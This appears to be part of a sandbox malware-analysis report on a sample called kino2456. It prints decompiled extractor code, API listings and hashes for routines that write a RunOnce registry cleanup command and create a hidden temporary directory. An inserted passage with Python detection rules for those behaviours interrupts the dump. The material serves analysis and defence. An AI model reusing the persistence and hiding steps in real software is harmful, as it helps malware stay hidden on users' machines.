                                                                                                                                                                                                                                    					_t84 = _t46;
                                                                                                                                                                                                                                    					if(_t84 == 0) {
                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                    						if(GetModuleFileNameA( *0x969a3c,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                    							L17:
                                                                                                                                                                                                                                    							_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                    							L23:
                                                                                                                                                                                                                                    							_pop(_t86);
                                                                                                                                                                                                                                    							goto L24;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						L11:
                                                                                                                                                                                                                                    						_t72 =  &_v268;
                                                                                                                                                                                                                                    						_t80 = _t72 + 1;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t49 =  *_t72;
                                                                                                                                                                                                                                    							_t72 = _t72 + 1;
                                                                                                                                                                                                                                    						} while (_t49 != 0);
                                                                                                                                                                                                                                    						_t73 = _t72 - _t80;
                                                                                                                                                                                                                                    						_t81 = 0x9691e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t50 =  *_t81;
                                                                                                                                                                                                                                    							_t81 = _t81 + 1;
                                                                                                                                                                                                                                    						} while (_t50 != 0);
                                                                                                                                                                                                                                    						_t84 = _t73 + 0x50 + _t81 - 0x9691e5;
                                                                                                                                                                                                                                    						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0x9691e5);
                                                                                                                                                                                                                                    						if(_t90 != 0) {
                                                                                                                                                                                                                                    							 *0x968580 = _t66 ^ 0x00000001;
                                                                                                                                                                                                                                    							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                                                                                                                                                                                    							if(_t66 == 0) {
                                                                                                                                                                                                                                    								_t54 = "%s /D:%s";
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push("C:\Users\hardz\AppData\Local\Temp\IXP002.TMP\");
                                                                                                                                                                                                                                    							E0096171E(_t90, _t84, _t54,  &_v268);
                                                                                                                                                                                                                                    							_t75 = _t90;
                                                                                                                                                                                                                                    							_t23 = _t75 + 1; // 0x1
                                                                                                                                                                                                                                    							_t79 = _t23;
                                                                                                                                                                                                                                    							do {
                                                                                                                                                                                                                                    								_t56 =  *_t75;
                                                                                                                                                                                                                                    								_t75 = _t75 + 1;
                                                                                                                                                                                                                                    							} while (_t56 != 0);
                                                                                                                                                                                                                                    							_t24 = _t75 - _t79 + 1; // 0x2
                                                                                                                                                                                                                                    							RegSetValueExA(_v532, "wextract_cleanup2", 0, 1, _t90, _t24); // executed
                                                                                                                                                                                                                                    							RegCloseKey(_v532); // executed
                                                                                                                                                                                                                                    							_t36 = LocalFree(_t90);
                                                                                                                                                                                                                                    							goto L23;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t79 = 0x4b5;
                                                                                                                                                                                                                                    						E009644B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                                                                                                                                                                                    						goto L17;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                                                                                                                                                                                    					_t66 = 0 | _t91 != 0x00000000;
                                                                                                                                                                                                                                    					FreeLibrary(_t84); // executed
                                                                                                                                                                                                                                    					if(_t91 == 0) {
                                                                                                                                                                                                                                    						goto L10;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                    						E0096658A( &_v268, 0x104, 0x961140);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					goto L11;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t36 = RegCloseKey(_v532);
                                                                                                                                                                                                                                    				 *0x968530 = _t66;
                                                                                                                                                                                                                                    				goto L23;
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x009621a8
                                                                                                                                                                                                                                    0x009621b0
                                                                                                                                                                                                                                    0x009621b0
                                                                                                                                                                                                                                    0x009621b2
                                                                                                                                                                                                                                    0x009621b3
                                                                                                                                                                                                                                    0x009621bc
                                                                                                                                                                                                                                    0x009621c7
                                                                                                                                                                                                                                    0x009621cb
                                                                                                                                                                                                                                    0x009621f1
                                                                                                                                                                                                                                    0x009621f6
                                                                                                                                                                                                                                    0x009621fd
                                                                                                                                                                                                                                    0x009621ff
                                                                                                                                                                                                                                    0x009621ff
                                                                                                                                                                                                                                    0x00962204
                                                                                                                                                                                                                                    0x00962213
                                                                                                                                                                                                                                    0x00962218
                                                                                                                                                                                                                                    0x0096221d
                                                                                                                                                                                                                                    0x0096221d
                                                                                                                                                                                                                                    0x00962220
                                                                                                                                                                                                                                    0x00962220
                                                                                                                                                                                                                                    0x00962222
                                                                                                                                                                                                                                    0x00962223
                                                                                                                                                                                                                                    0x00962229
                                                                                                                                                                                                                                    0x0096223d
                                                                                                                                                                                                                                    0x00962249
                                                                                                                                                                                                                                    0x00962250
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962250
                                                                                                                                                                                                                                    0x009621d2
                                                                                                                                                                                                                                    0x009621d9
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009621d9
                                                                                                                                                                                                                                    0x0096213a
                                                                                                                                                                                                                                    0x00962141
                                                                                                                                                                                                                                    0x00962144
                                                                                                                                                                                                                                    0x0096214c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962163
                                                                                                                                                                                                                                    0x00962172
                                                                                                                                                                                                                                    0x00962172
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00962163
                                                                                                                                                                                                                                    0x009620ea
                                                                                                                                                                                                                                    0x009620f0
                                                                                                                                                                                                                                    0x00000000

APIs
• memset.MSVCRT ref: 00962050
• memset.MSVCRT ref: 0096205F
• RegCreateKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00000000,00000000,0002001F,00000000,?,?,?,?,?,?,00000000,00000000), ref: 0096208C
  • Part of subcall function 0096171E: _vsnprintf.MSVCRT ref: 00961750
• RegQueryValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009620C9
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009620EA
• GetSystemDirectoryA.KERNEL32 ref: 00962103
• LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962122
• GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00962134
• FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962144
• GetSystemDirectoryA.KERNEL32 ref: 0096215B
• GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0096218C
• LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009621C1
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 009621E4
• RegSetValueExA.KERNELBASE(?,wextract_cleanup2,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0096223D
• RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962249
• LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00962250
Strings
Memory Dump Source
• Source File: 00000002.00000002.430454699.0000000000961000.00000020.00000001.01000000.00000005.sdmp, Offset: 00960000, based on PE: true
• Associated: 00000002.00000002.430432662.0000000000960000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430498862.0000000000968000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096A000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.430508939.000000000096C000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_960000_kino2456.jbxd
Similarity
• API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
• String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP002.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup2
• API String ID: 178549006-2663108224
• Opcode ID: a3bd406f8c9d7de29adffe45b8d9976dc1d001e2118753e5b8c396ea51e67b4c
• Instruction ID: 452aabd9f8ebc0977c8fbb447d90660b18837e567fbb7bf34a8ab88dd1a5f44e
• Opcode Fuzzy Hash: a3bd406f8c9d7de29adffe45b8d9976dc1d001e2118753e5b8c396ea51e67b4c
• Instruction Fuzzy Hash: AC513671A18214ABDB209B60DC49FFB777CEB92700F0002A9FA45F7151EAB19E45DF60
Uniqueness

Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                                                                                                    			E009655A0(void* __eflags) {
                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                    				char _v265;
                                                                                                                                                                                                                                    				char _v268;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				signed int _t28;
                                                                                                                                                                                                                                    				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x968004; // 0xf4cc89a0
				_v8 = _t28 ^ _t110;
				_t2 = E0096468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0096468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x969a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x968b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x968a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00966517(_t82, 0x7d2, 0, E00963210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x969a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x9691e4;
									_t40 = GetTempPathA(0x104, 0x9691e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00961781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00966952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0096597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00962630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0096658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x9691e4;
																					E00961781(0x9691e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00965467(0x9691e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
                                                                                                                                                                                                                                    																						goto L42;
                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t60 = _v268 + 1;
                                                                                                                                                                                                                                    																					_v265 = 0;
                                                                                                                                                                                                                                    																					_v268 = _t60;
                                                                                                                                                                                                                                    																					goto L42;
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																			} else {
                                                                                                                                                                                                                                    																				_t65 = E00962630(0,  &_v268, 1);
                                                                                                                                                                                                                                    																				__eflags = _t65;
                                                                                                                                                                                                                                    																				if(_t65 != 0) {
                                                                                                                                                                                                                                    																					goto L28;
                                                                                                                                                                                                                                    																				} else {
                                                                                                                                                                                                                                    																					_t67 = E0096597D( &_v268, 1, 1, 0);
                                                                                                                                                                                                                                    																					__eflags = _t67;
                                                                                                                                                                                                                                    																					if(_t67 == 0) {
                                                                                                                                                                                                                                    																						goto L28;
                                                                                                                                                                                                                                    																					} else {
                                                                                                                                                                                                                                    																						goto L33;
                                                                                                                                                                                                                                    																					}
                                                                                                                                                                                                                                    																				}
                                                                                                                                                                                                                                    																			}
                                                                                                                                                                                                                                    																		} else {
                                                                                                                                                                                                                                    																			goto L28;
                                                                                                                                                                                                                                    																		}
                                                                                                                                                                                                                                    																	}
                                                                                                                                                                                                                                    																}
                                                                                                                                                                                                                                    															}
                                                                                                                                                                                                                                    														}
                                                                                                                                                                                                                                    													} else {
                                                                                                                                                                                                                                    														goto L22;
                                                                                                                                                                                                                                    													}
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												goto L47;
                                                                                                                                                                                                                                    												L42:
                                                                                                                                                                                                                                    												__eflags = _t60 - 0x5a;
                                                                                                                                                                                                                                    											} while (_t60 <= 0x5a);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										goto L43;
                                                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                                                    										_t101 = 1;
                                                                                                                                                                                                                                    										_t69 = E00965467(0x9691e4, 1, 3); // executed
                                                                                                                                                                                                                                    										__eflags = _t69;
                                                                                                                                                                                                                                    										if(_t69 != 0) {
                                                                                                                                                                                                                                    											goto L45;
                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                    											_t82 = 0x9691e4;
                                                                                                                                                                                                                                    											_t70 = E00962630(0, 0x9691e4, 1);
                                                                                                                                                                                                                                    											__eflags = _t70;
                                                                                                                                                                                                                                    											if(_t70 != 0) {
                                                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                    												_t101 = 1;
                                                                                                                                                                                                                                    												_t82 = 0x9691e4;
                                                                                                                                                                                                                                    												_t71 = E00965467(0x9691e4, 1, 1);
                                                                                                                                                                                                                                    												__eflags = _t71;
                                                                                                                                                                                                                                    												if(_t71 != 0) {
                                                                                                                                                                                                                                    													goto L45;
                                                                                                                                                                                                                                    												} else {
                                                                                                                                                                                                                                    													do {
                                                                                                                                                                                                                                    														goto L19;
                                                                                                                                                                                                                                    														L43:
                                                                                                                                                                                                                                    														GetWindowsDirectoryA( &_v268, 0x104);
                                                                                                                                                                                                                                    														_push(4);
                                                                                                                                                                                                                                    														_t101 = 3;
                                                                                                                                                                                                                                    														_t82 =  &_v268;
                                                                                                                                                                                                                                    														_t44 = E0096597D(_t82, _t101, 1);
                                                                                                                                                                                                                                    														__eflags = _t44;
                                                                                                                                                                                                                                    													} while (_t44 != 0);
                                                                                                                                                                                                                                    													goto L2;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							__eflags = _t35 - 0x5c;
                                                                                                                                                                                                                                    							if(_t35 != 0x5c) {
                                                                                                                                                                                                                                    								L10:
                                                                                                                                                                                                                                    								_t72 = 1;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								__eflags =  *0x968b3f - _t35; // 0x0
                                                                                                                                                                                                                                    								_t72 = 0;
                                                                                                                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                                                                                                                    									goto L10;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t101 = 0;
                                                                                                                                                                                                                                    							_t73 = E00965467(0x968b3e, 0, _t72);
                                                                                                                                                                                                                                    							__eflags = _t73;
                                                                                                                                                                                                                                    							if(_t73 != 0) {
                                                                                                                                                                                                                                    								L45:
                                                                                                                                                                                                                                    								_t38 = 1;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_t101 = 0x4be;
                                                                                                                                                                                                                                    								E009644B9(0, 0x4be, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    								goto L2;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t101 = 0x4b1;
                                                                                                                                                                                                                                    						E009644B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    						LocalFree(_t109);
                                                                                                                                                                                                                                    						 *0x969124 = 0x80070714;
                                                                                                                                                                                                                                    						goto L2;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t101 = 0x4b5;
                                                                                                                                                                                                                                    					E009644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    					 *0x969124 = E00966285();
                                                                                                                                                                                                                                    					L2:
                                                                                                                                                                                                                                    					_t38 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				L47:
                                                                                                                                                                                                                                    				return E00966CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
                                                                                                                                                                                                                                    			}
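The decompiled routine above creates a directory with CreateDirectoryA, then calls SetFileAttributesA on the same buffer with attribute value 2, which is FILE_ATTRIBUTE_HIDDEN, and in the other branch increments the first byte of the path buffer and loops while it is at most 0x5a ('Z'). As an added example, not part of this report and not code from the sample, the Python below turns those two observations into detection logic run over an API trace: it flags a directory that is created and immediately hidden by the same process, and a process that attempts CreateDirectoryA on several different drive roots. The pipe-delimited trace format and every event in it are constructed for the example; reading the byte-increment loop as a drive-letter sweep is an interpretation of the decompile, not a statement the report makes.

```python
"""Flag hide-after-create and drive-root sweeps in a constructed API trace."""
from collections import defaultdict

# Windows constant: the value 2 passed as SetFileAttributesA's second argument.
FILE_ATTRIBUTE_HIDDEN = 0x2

# Constructed trace for this example (not from the report). Fields: pid|api|path|arg
SAMPLE_TRACE = r"""
1234|CreateDirectoryA|C:\ProgramData\abc|
1234|SetFileAttributesA|C:\ProgramData\abc|2
1234|GetWindowsDirectoryA|C:\Windows|260
5678|CreateDirectoryA|C:\Users\u\Documents\new|
5678|SetFileAttributesA|C:\Users\u\Documents\new|128
9999|CreateDirectoryA|D:\x|
9999|CreateDirectoryA|E:\x|
9999|CreateDirectoryA|F:\x|
"""


def parse_trace(text):
    """Parse pipe-delimited trace lines into dicts; an empty arg becomes None."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        pid, api, path, arg = line.split("|", 3)
        events.append({
            "pid": int(pid),
            "api": api,
            "path": path,
            "arg": int(arg, 0) if arg else None,  # accepts "2", "0x2", "128"
        })
    return events


def find_hidden_dir_creations(events, window=5):
    """Return (pid, path) for each CreateDirectoryA that the same process follows,
    within `window` later events, with SetFileAttributesA carrying the HIDDEN bit."""
    hits = []
    for i, ev in enumerate(events):
        if ev["api"] != "CreateDirectoryA":
            continue
        for later in events[i + 1:i + 1 + window]:
            if later["pid"] != ev["pid"] or later["api"] != "SetFileAttributesA":
                continue
            same_path = later["path"].lower() == ev["path"].lower()
            hidden = later["arg"] is not None and later["arg"] & FILE_ATTRIBUTE_HIDDEN
            if same_path and hidden:
                hits.append((ev["pid"], ev["path"]))
                break
    return hits


def find_drive_sweeps(events, min_drives=3):
    """Return {pid: sorted drive letters} for processes that call CreateDirectoryA
    on at least `min_drives` distinct drive roots, the pattern a loop stepping the
    first byte of "X:\\..." through the alphabet would produce."""
    roots = defaultdict(set)
    for ev in events:
        path = ev["path"]
        if ev["api"] == "CreateDirectoryA" and len(path) >= 2 and path[1] == ":":
            roots[ev["pid"]].add(path[0].upper())
    return {pid: sorted(d) for pid, d in roots.items() if len(d) >= min_drives}


if __name__ == "__main__":
    evs = parse_trace(SAMPLE_TRACE)
    print("hidden after create:", find_hidden_dir_creations(evs))
    print("drive sweeps:", find_drive_sweeps(evs))
```

The second rule deliberately ignores the directory name, since in the decompile that name comes from a buffer filled earlier and is not visible here; the sweep across drive roots is the stable signal. A real trace source (Sysmon, an API monitor, ETW) would need its own parser in place of `parse_trace`.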

                                                                                                                                                                                                                                    0x00965753
                                                                                                                                                                                                                                    0x0096574f
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096572e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965864
                                                                                                                                                                                                                                    0x00965717
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656c3
                                                                                                                                                                                                                                    0x009656c5
                                                                                                                                                                                                                                    0x009656c9
                                                                                                                                                                                                                                    0x009656ce
                                                                                                                                                                                                                                    0x009656d0
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656d6
                                                                                                                                                                                                                                    0x009656d6
                                                                                                                                                                                                                                    0x009656d8
                                                                                                                                                                                                                                    0x009656dd
                                                                                                                                                                                                                                    0x009656df
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656e1
                                                                                                                                                                                                                                    0x009656e2
                                                                                                                                                                                                                                    0x009656e4
                                                                                                                                                                                                                                    0x009656e6
                                                                                                                                                                                                                                    0x009656eb
                                                                                                                                                                                                                                    0x009656ed
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x009656f3
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096586c
                                                                                                                                                                                                                                    0x00965878
                                                                                                                                                                                                                                    0x0096587e
                                                                                                                                                                                                                                    0x00965882
                                                                                                                                                                                                                                    0x00965883
                                                                                                                                                                                                                                    0x00965889
                                                                                                                                                                                                                                    0x0096588e
                                                                                                                                                                                                                                    0x0096588e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965896
                                                                                                                                                                                                                                    0x009656ed
                                                                                                                                                                                                                                    0x009656df
                                                                                                                                                                                                                                    0x009656d0
                                                                                                                                                                                                                                    0x009656c1
                                                                                                                                                                                                                                    0x009656a8
                                                                                                                                                                                                                                    0x0096565b
                                                                                                                                                                                                                                    0x0096565b
                                                                                                                                                                                                                                    0x0096565d
                                                                                                                                                                                                                                    0x00965669
                                                                                                                                                                                                                                    0x00965669
                                                                                                                                                                                                                                    0x0096565f
                                                                                                                                                                                                                                    0x0096565f
                                                                                                                                                                                                                                    0x00965665
                                                                                                                                                                                                                                    0x00965667
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965667
                                                                                                                                                                                                                                    0x0096566c
                                                                                                                                                                                                                                    0x00965673
                                                                                                                                                                                                                                    0x00965678
                                                                                                                                                                                                                                    0x0096567a
                                                                                                                                                                                                                                    0x0096589b
                                                                                                                                                                                                                                    0x0096589b
                                                                                                                                                                                                                                    0x00965680
                                                                                                                                                                                                                                    0x00965685
                                                                                                                                                                                                                                    0x0096568c
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x0096568c
                                                                                                                                                                                                                                    0x0096567a
                                                                                                                                                                                                                                    0x0096560e
                                                                                                                                                                                                                                    0x00965613
                                                                                                                                                                                                                                    0x0096561a
                                                                                                                                                                                                                                    0x00965620
                                                                                                                                                                                                                                    0x00965626
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00965626
                                                                                                                                                                                                                                    0x009655db
                                                                                                                                                                                                                                    0x009655e0
                                                                                                                                                                                                                                    0x009655e7
                                                                                                                                                                                                                                    0x009655f1
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009655f6
                                                                                                                                                                                                                                    0x009658b7
                                                                                                                                                                                                                                    0x009658c7

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646A0
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: SizeofResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646A9
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 009646C3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LoadResource.KERNEL32(00000000,00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646CC
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: LockResource.KERNEL32(00000000,?,00962D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 009646D3
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: memcpy_s.MSVCRT ref: 009646E5
                                                                                                                                                                                                                                      • Part of subcall function 0096468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 009646EF
                                                                                                                                                                                                                                    • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 009655CF
                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00965638
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000), ref: 0096564C
                                                                                                                                                                                                                                    • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00965620
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00964518
                                                                                                                                                                                                                                      • Part of subcall function 009644B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00964554
                                                                                                                                                                                                                                      • Part of subcall function 00966285: GetLastError.KERNEL32(00965BBC), ref: 00966285
                                                                                                                                                                                                                                    • GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP002.TMP\), ref: 009656B9
                                                                                                                                                                                                                                    • GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0096571E
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00965737
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 009657CD
                                                                                                                                                                                                                                    • GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 009657EF
                                                                                                                                                                                                                                    • CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00965802
                                                                                                                                                                                                                                      • Part of subcall function 00962630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00962654
                                                                                                                                                                                                                                    • SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00965830
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FindResourceA.KERNEL32(00960000,000007D6,00000005), ref: 0096652A
                                                                                                                                                                                                                                      • Part of subcall function 00966517: LoadResource.KERNEL32(00960000,00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00966538
                                                                                                                                                                                                                                      • Part of subcall function 00966517: DialogBoxIndirectParamA.USER32(00960000,00000000,00000547,009619E0,00000000), ref: 00966557
                                                                                                                                                                                                                                      • Part of subcall function 00966517: FreeResource.KERNEL32(00000000,?,?,00962EE8,00000000,009619E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00966560
                                                                                                                                                                                                                                    • GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00965878
                                                                                                                                                                                                                                      • Part of subcall function 0096597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 009659A8
